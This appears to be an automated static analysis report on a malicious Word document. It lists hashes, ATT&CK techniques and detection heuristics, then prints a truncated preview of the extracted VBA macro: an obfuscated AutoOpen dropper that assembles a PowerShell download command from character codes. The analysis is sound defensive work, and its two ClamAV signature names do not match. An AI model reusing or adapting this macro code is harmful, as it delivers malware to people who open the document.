Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 36b5f2dc6a15ea9c…

MALICIOUS

Office (OLE)

Size: 105.0 KB
Created: 2018-06-19 15:29:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 717cb62cf0c79938e30095b03958edd8
SHA-1: 7c804a1e042a127e70abe39c7fe7c2df4563dc09
SHA-256: 36b5f2dc6a15ea9c075d0a7fdcbb6dee5ec09dd34a76205aff8a1fac4ed8c54a
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that uses the Shell() function. This macro constructs and executes a PowerShell command to download a payload from a hardcoded URL. The ClamAV detection 'Doc.Dropper.Agent-6584881-0' further supports the dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6584812-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6584812-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13826 bytes
SHA-256: 7fdda5e5f40cdabf9c2afad13f47fa24b89bd6e6f4dba5ffe298def8d4f186eb
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "EIaGwYfKOGT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tHdFDPXN"
Function tbACDZ()
On Error Resume Next
jUwls = 46737
HZGfzZ = CByte(htZako)
CIjWt = CDate(66407)
MoUnJQ = CDate(IWzzhX + Sin(92551 + 13705) * 13398 * CInt(77758))
wpAvk = 73305
jJSlwm = uphLO
EnTmLWfwTDC = "OwerSHell  & (" + "(gV '*MdR*')" + ".NAME[3," + "11,2]-" + "JoiN" + "'')( (( 30, 80" + ", 86 ,89 ,8" + "4 ,123 , 105 , " + "26 , 7, 26,"
nIRZXZ = 51099
QQvCv = CByte(NZVash)
OawzH = CDate(69601)
sXAWU = CDate(GXrsNW + Sin(22734 + 30782) * 58150 * CInt(47859))
cQpZK = 87468
JTmlQf = sEVZi
zzbNui = "84,95 ," + "77 ,23 , 8" + "5 , 88 , 80" + " , 95 "
YhwWp = 64629
MWWFkB = CByte(nnzOb)
fiQbhp = CDate(47809)
zjlFk = CDate(NcVQw + Sin(66631 + 6892) * 15762 * CInt(42190))
pzILO = 80089
QojGoc = KiCluQ
iBsNpH = ",89 , 78 , 2" + "6 , 72 , 9" + "1,84 , 94 " + ", 85 , 87 , " + "1, 30, 109" + " , 98" + ", 64, 108 ,64 " + ", 112, 26 ,7,2" + "6 " + ", 84,9"
zztwLS = 64470
tnXIi = CByte(sJRbV)
aXiXSL = CDate(97432)
zZrtjz = CDate(pmIcJ + Sin(20081 + 85662) * 79368 * CInt(28054))
jAUGV = 36985
miLwp = ktBJcR
tYlnCmW = "5,77 ,23" + ", " + "85, 88, 80 ,9" + "5, 89"
dckvDX = 18885
MiiiTJ = CByte(dniHjH)
fonYQ = CDate(53248)
pDXWSj = CDate(zPtSh + Sin(72438 + 62958) * 43985 * CInt(51740))
iGiWX = 50393
zMzXjc = kodwv
IwKtZnFEw = ", 78" + ", 26" + " , 10" + "5 ,67,73 , 7"
MBZWf = 45583
pBVTIN = CByte(aDbFIb)
ldFNB = CDate(16453)
LwPJw = CDate(ivmdr + Sin(16889 + 85033) * 46774 * CInt(65877))
XTJiPV = 57262
KoiNE = GQOwB
EhfokT = "8 ," + "95 ,87" + ",20 ,116 " + ", 95 ,78, 20,1"
tbACDZ = EnTmLWfwTDC + zzbNui + iBsNpH + tYlnCmW + IwKtZnFEw + EhfokT
End Function
Function prSPkG()
On Error Resume Next
GJLwL = 59483
wOAjl = CByte(KvYTu)
Iswvw = CDate(27418)
YSUNt = CDate(ufNAc + Sin(69265 + 3631) * 48566 * CInt(72256))
KHONj = 7481
COPQW = YkKUK
oruQKPLUITa = "09, 95,88, 121 " + ", 86, 83,95, 84" + " , " + "78, 1 , 30" + " ,92, 83," + " 105 ," + "113"
wdBGM = 82157
zuvjt = CByte(Xkwhiz)
LujCZM = CDate(49096)
FmPAz = CDate(niBHC + Sin(49121 + 96860) * 29301 * CInt(56351))
jzRDrI = 63194
abYzaK = ilSvDu
jalUE = ", 115, 26, 7 ," + "26, 29 ,82 , 78" + ",78 , 74 , 0 ," + " 21" + " ,21 " + ",77, 77 " + ",77, 20 , " + "89,82"
vSjGvZ = 61393
mwRvc = CByte(nbuvFk)
fXjjC = CDate(51267)
IuXUH = CDate(fGNTPG + Sin(97953 + 25602) * 61730 * CInt(97962))
szcQr = 47763
wWiMpI = CwUPvA
CqYsp = " ," + "91" + ", 87, 88 ,95, 7" + "2 , 73,78 , " + "83 ,"
nkShNb = 61244
lBzYwl = CByte(sqSmaR)
WQKNz = CDate(43182)
Wzoaq = CDate(lQibh + Sin(32540 + 8220) * 21787 * CInt(37971))
WAdJq = 29266
WDlMH = zFwicO
vLvHJNwruR = " 87 ,88 ,95, " + "72,20,89" + ", 85 ,87 ,21,64" + " ,98,7" + "8 , 12" + "1,89,21 , 1" + "22, 82,78" + " ,78 ,74 , 0"
KwGZu = 53919
rEJNz = CByte(znJMJ)
kzibL = CDate(67299)
NHaEH = CDate(wPFYw + Sin(22494 + 33809) * 59608 * CInt(49472))
EcWvqY = 27773
BoRcM = irRzp
AiFoPjKV = " , 21,2" + "1,77 , 77 " + ",77 ,20 " + ", 81 ," + "83 ,72 ,74,83" + ", 89 ,82 ,23,"
QACAD = 74598
PMAsVK = CByte(jnuGKK)
jmIXR = CDate(22565)
BBVtQV = CDate(BmQZZK + Sin(37530 + 58917) * 32926 * CInt(13443))
mbPNLf = 97806
UKvjB = NEfjNu
inoDs = " 73,95, 72 " + ",76 ,83,73," + "11 ,12 ,20" + " ," + "72,79 , 21 "
pEfBd = 63929
AFFVBD = CByte(BhSAkj)
pJnso = CDate(73895)
uFTlIO = CDate(GQiYDb + Sin(7376 + 50872) * 52424 * CInt(85189))
unGzlj = 86556
ZqZivL = SszurI
vWXPovsWd = ", 94, 64, " + "15 ,107,126," + "21 ," + "122,82 " + ", 78, 78 ," + "74 ,0 , 21 , 21"
prSPkG = oruQKPLUITa + jalUE + CqYsp + vLvHJNwruR + AiFoPjKV + inoDs + vWXPovsWd
End Function
Function ZmouZCISDaA()
On Error Resume Next
QvQkch = 9069
PivzP = CByte(YLKIrp)
fLZZj = CDate(15841)
zbpIzk = CDate(dRKiM + Sin(26539 + 69716) * 70230 * CInt(24175))
sZQKo = 85733
JZwOuo = sDSkkr
vYWYswcspY = ", 77 
... (truncated)